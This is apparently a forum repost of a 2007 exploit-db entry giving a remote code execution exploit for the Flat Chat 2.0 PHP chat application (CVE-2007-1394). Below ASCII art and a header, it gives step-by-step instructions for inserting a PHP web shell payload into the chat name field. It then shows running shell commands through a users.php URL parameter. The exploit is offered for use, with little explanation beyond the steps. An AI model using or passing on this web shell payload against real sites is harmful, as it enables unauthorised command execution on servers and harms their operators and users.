Exploit Flat Chat 2.0 - 'include online.txt' Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3428
Проверка EDB
  1. Пройдено
Автор
DJ7XPL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1394
Дата публикации
2007-03-07
Код:
                                           .-""""""""-.                                 
                                          /   Dj7xpl   \                              
                                         |              |                                
                                         |,  .-.  .-.  ,|                                
                                         | )(_o/  \o_)( |                                     
                                         |/     /\     \|                                 
                               (@_       (_     ^^     _)                  
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Author   : Dj7xpl  | [email protected]       |
+                               | Download : Http://www.undoweb.frih.net      |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+                                                                              				            	  
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-07]
 
Источник
www.exploit-db.com

Похожие темы